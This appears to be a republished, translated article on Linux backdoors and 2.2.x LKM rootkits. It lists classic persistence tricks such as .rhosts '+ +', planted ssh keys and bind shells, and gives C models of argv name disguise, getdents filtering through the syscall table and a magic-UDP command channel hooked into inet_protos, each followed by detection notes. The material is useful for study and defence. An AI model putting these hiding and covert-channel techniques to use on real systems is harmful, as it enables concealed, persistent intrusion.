Backdoor technology and Linux LKM rootkits

Source: Internet
Author: User
Introduction: This article surveys a range of backdoor techniques, with particular attention to Linux Loadable Kernel Modules (LKMs). We will see that LKM backdoors are more complex and more powerful than traditional backdoors, and correspondingly harder to detect. With that background we build our own LKM-based rootkit, implemented mainly at the TCP/IP layer, because we believe that is the best place to hide a backdoor from the system administrator.

Preface

Among hacker groups, rootkits (or backdoors) are a topic of great interest, and many different rootkits have been developed and published on the Internet. Of these, LKM rootkits draw particular attention because they use the module mechanism of modern operating systems. Running as part of the kernel, such a rootkit is both more powerful and less noticeable than traditional techniques. Once it is installed and running on the target machine, the system is completely under the attacker's control, and the system administrator cannot find any trace of the compromise, because the operating system itself can no longer be trusted.

This article and the LKM programs we have developed are based on Linux kernel 2.2.x. Our goal is to hide as many footprints as possible.

The next section introduces the existing backdoor techniques and compares them with the LKM approach; after that we discuss the design and implementation of our LKM program.

The purpose of a backdoor is to preserve the attacker's access to a system even after the administrator has patched the vulnerability that was used to get in. A backdoor can give a local user root privileges in one of the following ways: a setuid program, a trojaned system program, or a cron backdoor.

1. Setuid program. The attacker leaves a setuid-root program somewhere in the filesystem; whenever he runs it, he becomes root. (Linux ignores the setuid bit on interpreted scripts, so this is a compiled binary or a setuid copy of a shell.)

2. Trojaned system program. The attacker replaces a system program such as "login" with a modified copy that grants him root whenever a particular condition is met (a magic password, for example).

3. Cron backdoor. The attacker adds or modifies a cron job so that at a given time a program runs that grants him root.

A backdoor can give a remote user privileged access in the following ways: a ".rhosts" file, an ssh authorized key, a bind shell, or a trojaned service program.

1. ".rhosts" file. Once the line "+ +" (any host, any user) has been added to a user's .rhosts file, anyone can log in to that account through the r-services (rlogin, rsh) from any host without a password.

2. ssh authorized key. The attacker adds his own public key to the target account's "authorized_keys" file, after which he can log in to that account over ssh without a password.

3. Bind shell. The attacker binds a shell to a particular tcp port; anyone who connects to (telnets to) that port gets an interactive shell. More sophisticated backdoors listen on udp, on unconnected tcp, or even on icmp.

4. Trojaned service program. Any listening service can be trojaned to give a remote user access: for example, an extra inetd entry that serves a shell on a chosen port, or a modified ssh daemon with a backdoor credential.

Once the backdoor is installed and running, the intruder looks for ways to stay out of the administrator's sight. This involves two things: hiding his files and hiding his processes.

To hide files, the intruder replaces common system commands such as "ls", "du" and "fsck" with copies that skip his entries. At a lower level, he may mark some areas of the disk as bad blocks and store his files there, or, if he is bold enough, put them in the boot block.

To hide a process, he can replace the "ps" program, or overwrite the process's own argv[] so that it looks like a legitimate service. Note also that code which runs as an interrupt handler rather than as a process never appears in the process table at all.
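The argv[] trick, as an added example that is not the article's code. On Linux the argument strings a process received are laid out back to back in one block of memory, and "ps" reads that block through /proc/PID/cmdline, so a process can rewrite its own command line in place. The fake name "klogd" is an arbitrary choice for illustration.

```c
#include <stdio.h>
#include <string.h>
#include <unistd.h>

/* Overwrite the contiguous argv block with a fake command line.
 * Returns the number of bytes of argv memory that were available
 * (the fake name is truncated to fit), or 0 if nothing was done. */
size_t disguise_argv(int argc, char **argv, const char *fake)
{
    if (argc < 1 || argv == NULL || argv[0] == NULL)
        return 0;
    /* The block runs from the start of argv[0] to the end of argv[argc-1]. */
    char *start = argv[0];
    char *end = argv[argc - 1] + strlen(argv[argc - 1]);
    size_t avail = (size_t)(end - start);
    size_t n = strlen(fake);
    if (n > avail)
        n = avail;                       /* never write past the block */
    memset(start, 0, avail);             /* wipe the real arguments */
    memcpy(start, fake, n);
    for (int i = 1; i < argc; i++)
        argv[i] = end;                   /* later args become empty strings */
    return avail;
}

int main(int argc, char **argv)
{
    size_t avail = disguise_argv(argc, argv, "klogd");
    printf("rewrote %zu bytes of argv; check with: ps -p %d -o pid,comm,args\n",
           avail, (int)getpid());
    sleep(30);                           /* time to inspect from another terminal */
    return 0;
}
```

The caveat a careful administrator relies on: only /proc/PID/cmdline changes. The "comm" field in /proc/PID/stat is set from the executable's file name at exec time, and /proc/PID/exe still points at the real binary, so "ps -o comm" or "ls -l /proc/PID/exe" still gives the process away unless "ps" itself has been trojaned. That is one more reason the article moves the hiding into the kernel.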

LKM: is there anything worse than this?

We have looked at the conventional techniques. The question now is: can the system administrator find them? In practice a good administrator can find 99% of them quite easily, because the intruder has to modify or create important files. If the administrator keeps a copy of the "tripwire" database, a comparison reveals the tampering, and a walk through the filesystem turns up the setuid programs and the ".rhosts" files.

With an LKM we can get around these limits. First, we do not have to modify or create any file in an important system directory: the LKM can sit in /tmp or /var/tmp, which administrators normally do not monitor. Second, we can hide anything we want, such as files, processes and network connections, because every tool that reports this information ultimately relies on system calls.

So we modify the kernel's data structures and replace the original system calls with our own functions. Going further, we can even intercept or modify the TCP/IP protocol stack and fool the kernel itself. The following sections describe these mechanisms and how we implemented them.
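How the system-call replacement hides files, shown as an added user-space model rather than the article's kernel module (a 2.2.x module cannot be compiled or run outside the kernel). In 2.2.x the kernel's sys_call_table[] is an exported array of function pointers; a module saves the original entry for getdents, stores its own function there, and has that function call the original and then drop the entries it wants hidden. Everything below (the table, the slot number, the dirent record, the sample directory contents and the "_hk_" prefix) is a stand-in constructed for this example.

```c
#include <stdio.h>
#include <string.h>

#define NR_CALLS 4              /* toy table size */
#define SYS_getdents 2          /* stand-in slot number, not the real one */
#define HIDE_PREFIX "_hk_"      /* assumed: names with this prefix vanish */
#define MAX_ENTRIES 16

struct dirent_rec { char name[32]; };

/* Every "system call" in this model has the same signature: fill a buffer
 * of dirent records for a directory, return how many were written. */
typedef int (*syscall_fn)(const char *dir, struct dirent_rec *buf, int max);

/* Constructed sample directory contents standing in for the real disk. */
static const char *sample_dir[] = { "passwd", "_hk_rootkit.o", "shadow", "_hk_log", "hosts" };

/* The real handler: what the kernel's sys_getdents would return. */
static int orig_getdents(const char *dir, struct dirent_rec *buf, int max)
{
    (void)dir;
    int n = 0;
    for (size_t i = 0; i < sizeof sample_dir / sizeof *sample_dir && n < max; i++) {
        snprintf(buf[n].name, sizeof buf[n].name, "%s", sample_dir[i]);
        n++;
    }
    return n;
}

/* The model's sys_call_table: slot SYS_getdents holds the real handler. */
static syscall_fn sys_call_table[NR_CALLS] = { 0, 0, orig_getdents, 0 };

/* Saved original pointer, kept so the hook can call through and so
 * cleanup_module() can restore it. */
static syscall_fn saved_getdents;

/* The rootkit's replacement: call the original, then drop hidden entries. */
static int hacked_getdents(const char *dir, struct dirent_rec *buf, int max)
{
    int n = saved_getdents(dir, buf, max);
    int kept = 0;
    for (int i = 0; i < n; i++) {
        if (strncmp(buf[i].name, HIDE_PREFIX, strlen(HIDE_PREFIX)) == 0)
            continue;                   /* the caller never sees this one */
        if (kept != i)
            buf[kept] = buf[i];
        kept++;
    }
    return kept;
}

/* What init_module() does: swap the table entry. Guarded so that loading
 * twice does not make the hook call itself forever. */
void install_hook(void)
{
    if (sys_call_table[SYS_getdents] == hacked_getdents)
        return;
    saved_getdents = sys_call_table[SYS_getdents];
    sys_call_table[SYS_getdents] = hacked_getdents;
}

/* What cleanup_module() does: put the original back. */
void remove_hook(void)
{
    if (saved_getdents)
        sys_call_table[SYS_getdents] = saved_getdents;
}

/* What "ls" effectively does: it goes through the table, never directly. */
int list_dir(const char *dir, struct dirent_rec *buf, int max)
{
    return sys_call_table[SYS_getdents](dir, buf, max);
}

int main(void)
{
    struct dirent_rec buf[MAX_ENTRIES];
    int n = list_dir("/etc", buf, MAX_ENTRIES);
    printf("before hook: %d entries\n", n);
    install_hook();
    n = list_dir("/etc", buf, MAX_ENTRIES);
    printf("after hook:  %d entries\n", n);
    for (int i = 0; i < n; i++)
        printf("  %s\n", buf[i].name);
    remove_hook();
    return 0;
}
```

Note that a replaced "ls" is no longer needed: every program that lists a directory, tripwire included, receives the filtered result. The check that still works is to compare the addresses stored in the kernel's sys_call_table (read through /dev/kmem) against the addresses recorded in the System.map of the running kernel; the replaced slot points into the module rather than into the kernel image.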

Our LKM program is built on Linux kernel 2.2.x and works at the TCP/IP layer, because a good backdoor must above all give a remote user access to the system. Simply opening a port on the target machine and running a service there is easy, but we want to hide ourselves as much as possible.

The first idea is that we run no process at all on the target machine waiting for connections. Instead we install a function inside the TCP/IP stack. Whenever a udp or tcp packet is received, the kernel examines it to decide whether it is one of our special packets; if so, the kernel spawns a process to execute the command carried in the packet. Any protocol the kernel supports can be used for this.

Now the implementation. In the kernel, each IP protocol (tcp, udp, icmp, ...) registers a struct inet_protocol: the registrations are chained on the inet_protocol_base list, and at initialization every supported protocol is added to the inet_protos[MAX_INET_PROTOS] hash table. Whenever an IP packet arrives, the kernel looks up the packet's protocol number in that hash table and calls the registered receive handler. This is the point we hook: we replace the original protocol's handler with our own. We can then intercept and analyze every packet; if it is one of ours, we execute the command, and if not, we simply call the original handler.
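The interception just described, as an added user-space model, not the article's kernel module. The model keeps an inet_protos[] table indexed the way 2.2.x does it (MAX_INET_PROTOS is 32 and the slot is protocol & 31), registers a stand-in udp handler, and then overwrites the handler pointer. The replacement parses the IPv4 and UDP headers with full bounds checks, swallows any packet whose payload starts with a magic marker and records the command that follows it, and passes everything else to the original handler. The marker "LKM1", the command buffer and the constructed packets are assumptions for this example; a real module would have to spawn a user-mode process to run the command, which the model replaces with storing it.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

#define MAX_INET_PROTOS 32      /* 2.2.x value */
#define PROTO_UDP 17
#define MAGIC "LKM1"            /* assumed marker at the start of the payload */
#define MAGIC_LEN 4
#define CMD_MAX 64

/* Model of struct inet_protocol: the receive handler that ip_local_deliver()
 * calls. Returns 1 if the packet was consumed, 0 otherwise. */
struct inet_protocol {
    int (*handler)(const uint8_t *pkt, size_t len);
    unsigned char protocol;
};

static struct inet_protocol *inet_protos[MAX_INET_PROTOS];

/* 2.2.x hashing rule: protocol number masked to the table size. */
static int proto_hash(unsigned char protocol)
{
    return protocol & (MAX_INET_PROTOS - 1);
}

/* Stand-in for the real udp_rcv(): it just counts what reaches it. */
static int udp_packets_delivered;
static int orig_udp_rcv(const uint8_t *pkt, size_t len)
{
    (void)pkt; (void)len;
    udp_packets_delivered++;
    return 1;
}
static struct inet_protocol udp_protocol = { orig_udp_rcv, PROTO_UDP };

/* Where the model puts the command a real module would execute. */
static char last_command[CMD_MAX];

/* Saved original handler, for pass-through and for cleanup. */
static int (*saved_udp_handler)(const uint8_t *, size_t);

/* Locate the UDP payload inside an IPv4 packet. Returns the payload length,
 * or -1 if the packet is not well-formed UDP. Every offset is checked first:
 * a hook that oopses the kernel on a short packet gives itself away. */
int udp_payload(const uint8_t *pkt, size_t len, const uint8_t **payload)
{
    if (len < 20 || (pkt[0] >> 4) != 4) return -1;
    size_t ihl = (size_t)(pkt[0] & 0x0f) * 4;
    if (ihl < 20 || len < ihl + 8) return -1;
    if (pkt[9] != PROTO_UDP) return -1;
    size_t total = ((size_t)pkt[2] << 8) | pkt[3];
    if (total > len || total < ihl + 8) return -1;
    size_t udp_len = ((size_t)pkt[ihl + 4] << 8) | pkt[ihl + 5];
    if (udp_len < 8 || ihl + udp_len > total) return -1;
    *payload = pkt + ihl + 8;
    return (int)(udp_len - 8);
}

/* The rootkit's replacement handler. */
static int hacked_udp_rcv(const uint8_t *pkt, size_t len)
{
    const uint8_t *p;
    int n = udp_payload(pkt, len, &p);
    if (n >= MAGIC_LEN && memcmp(p, MAGIC, MAGIC_LEN) == 0) {
        int clen = n - MAGIC_LEN;
        if (clen >= CMD_MAX) clen = CMD_MAX - 1;
        memcpy(last_command, p + MAGIC_LEN, (size_t)clen);
        last_command[clen] = '\0';
        return 1;                        /* swallowed: udp_rcv never sees it */
    }
    return saved_udp_handler(pkt, len);  /* ordinary traffic: pass through */
}

/* What inet_add_protocol() does at boot for udp. */
void register_udp(void)
{
    inet_protos[proto_hash(PROTO_UDP)] = &udp_protocol;
}

/* What init_module() does: overwrite the handler in the registered struct. */
void install_hook(void)
{
    struct inet_protocol *pr = inet_protos[proto_hash(PROTO_UDP)];
    if (!pr || pr->handler == hacked_udp_rcv) return;
    saved_udp_handler = pr->handler;
    pr->handler = hacked_udp_rcv;
}

/* What ip_local_deliver() does: look the protocol up and call its handler. */
int ip_local_deliver(const uint8_t *pkt, size_t len)
{
    if (len < 20) return 0;
    struct inet_protocol *pr = inet_protos[proto_hash(pkt[9])];
    return pr ? pr->handler(pkt, len) : 0;
}

/* Build a constructed IPv4/UDP packet around a payload (checksums left
 * zero; the model does not verify them). Returns the total length. */
size_t build_udp_packet(uint8_t *out, const char *payload)
{
    size_t plen = strlen(payload);
    size_t total = 20 + 8 + plen;
    memset(out, 0, 28);
    out[0] = 0x45;                                        /* IPv4, IHL 5 */
    out[2] = (uint8_t)(total >> 8); out[3] = (uint8_t)total;
    out[8] = 64;                                          /* TTL */
    out[9] = PROTO_UDP;
    out[12] = 10; out[15] = 2;                            /* src 10.0.0.2 */
    out[16] = 10; out[19] = 1;                            /* dst 10.0.0.1 */
    out[20] = 0x04; out[21] = 0xd2;                       /* src port 1234 */
    out[22] = 0x00; out[23] = 0x35;                       /* dst port 53 */
    out[24] = (uint8_t)((8 + plen) >> 8); out[25] = (uint8_t)(8 + plen);
    memcpy(out + 28, payload, plen);
    return total;
}

const char *get_last_command(void) { return last_command; }
int get_udp_delivered(void) { return udp_packets_delivered; }

int main(void)
{
    uint8_t pkt[128];
    register_udp();
    install_hook();
    size_t n = build_udp_packet(pkt, "LKM1/bin/echo hello");
    ip_local_deliver(pkt, n);
    printf("command received: %s, ordinary packets delivered: %d\n",
           get_last_command(), get_udp_delivered());
    return 0;
}
```

Because the magic packet is consumed before udp_rcv() runs, no socket is ever bound: "netstat" shows nothing, and there is no waiting process for "ps" to show. The packet is still on the wire, though, so a sniffer or a filtering router in front of the host sees it, and a packet to a port with no listener that never produces an ICMP port-unreachable reply is itself an anomaly worth alerting on.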
The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.